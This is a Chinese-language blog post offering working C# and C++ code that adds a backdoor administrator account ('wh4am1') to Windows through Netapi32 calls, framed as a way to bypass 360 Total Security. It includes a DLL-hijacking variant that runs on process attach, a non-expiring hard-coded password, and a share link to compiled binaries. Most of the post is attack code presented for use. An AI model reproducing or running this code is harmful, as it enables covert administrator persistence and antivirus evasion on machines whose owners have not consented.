利用C#编写的绕过360安全卫士添加系统用户

时间:2022-07-22
本文章向大家介绍利用C#编写的绕过360安全卫士添加系统用户,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

今天在群里看到一位大佬发的绕过360安全卫士添加系统用户权限的脚本,于是乎,我便下载下来分析可知是通过调用系统 API 函数来规避杀软:

所以我就蹭一波热度,自己写了个 C# 版本的, Class 类如下:

using System;
using System.Runtime.InteropServices;

namespace Bypass360
{
    public class LocalGroupUserHelper
    {
        [DllImport("Netapi32.dll")]
        extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);

        [DllImport("Netapi32.dll")]
        extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
         int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct LOCALGROUP_MEMBERS_INFO_3
        {
            public string domainandname; // //lgrmi3_domainandname
        }

       [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct USER_INFO_1
        {
            public string usri1_name;
            public string usri1_password;
            public int usri1_password_age;
            public int usri1_priv;
            public string usri1_home_dir;
            public string comment;
            public int usri1_flags;
            public string usri1_script_path;
        }

        /// 
        /// 添加一个用户,添加失败后返回非0 。
        /// 
        /// 机器名称,如果是本机,请设置为null
        /// 
        /// 
        /// 
        public void AddUser(string serverName, string userName, string password, string strComment)
        {
            USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例

            NewUser.usri1_name = userName; // Allocates the username
            NewUser.usri1_password = password; // allocates the password
            NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
            NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
            NewUser.comment = strComment; // Comment on the User
            NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path

            if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding User");
            }
        }

        /// 
        /// 在本地组中添加一个用户成员,添加失败后返回非0 。
        /// 
        /// 机器名称,如果是本机,请设置为null
        /// 
        /// 
        public void GroupAddMembers(string serverName, string groupName, string userName)
        {
            LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
            NewMember.domainandname = userName;
            if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding Group Member"); 
            }
        }
    }
}

在 Class 类中定义了系统需要用到的 API 函数

  • NetUserAdd
  • NetLocalGroupAddMembers

Main 类如下:

using System;
using System.Runtime.InteropServices;
using Bypass360;

namespace Bypass360Add
{
    public static class BypassUAC_csharp
    {

        [DllImport("kernel32.dll")]
        static extern void ExitProcess(uint uExitCode);

        public static void Main(string[] args)
        {
            LocalGroupUserHelper local = new LocalGroupUserHelper();
            string username = "wh4am1";
            string password = "qqai@love";
            string groupname = "Administrators";
            local.AddUser(null, username, password, null);
            local.GroupAddMembers(null, groupname, username);
            ExitProcess(1);
        }
    }
}

运行后会在目标机器上创建一个用户为 wh4am1 密码为 qqai@loveAdministrators 组用户

当然,如果是想利用 Dll 劫持等方式来添加用户,我也提供上 C++ Dll 的代码

#include 
#include 
#include 
#include

#pragma comment(lib,"netapi32.lib")
void StartExploitThread() {
  USER_INFO_1 ui;
  DWORD dwError = 0;
  ui.usri1_name = (LPWSTR) L"wh4am1";
  ui.usri1_password = (LPWSTR) L"qqai@love";
  ui.usri1_priv = USER_PRIV_USER;
  ui.usri1_home_dir = NULL;
  ui.usri1_comment = (LPWSTR) "";
  //UF_SCRIPT 登陆脚本执行,UF_DONT_EXPIRE_PASSWD 表示密码永不过期,  
  //UF_PASSWD_CANT_CHANGE 用户不能更改密码  
  ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD | UF_PASSWD_CANT_CHANGE;
  ui.usri1_script_path = NULL;

  NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
  LOCALGROUP_MEMBERS_INFO_3 account;
  account.lgrmi3_domainandname = (LPWSTR)L"wh4am1";

  NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
  switch (ul_reason_for_call)
  {
  case DLL_PROCESS_ATTACH:
    StartExploitThread();
    break;
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
    break;
  }
  return TRUE;
}

成功效果如下:

本文由“壹伴编辑器”提供技术支持

编译好的成品附件分享

链接:https://share.weiyun.com/5mbP3pC

密码:bugfor

end

随机文章
本站知识点必读
最近更新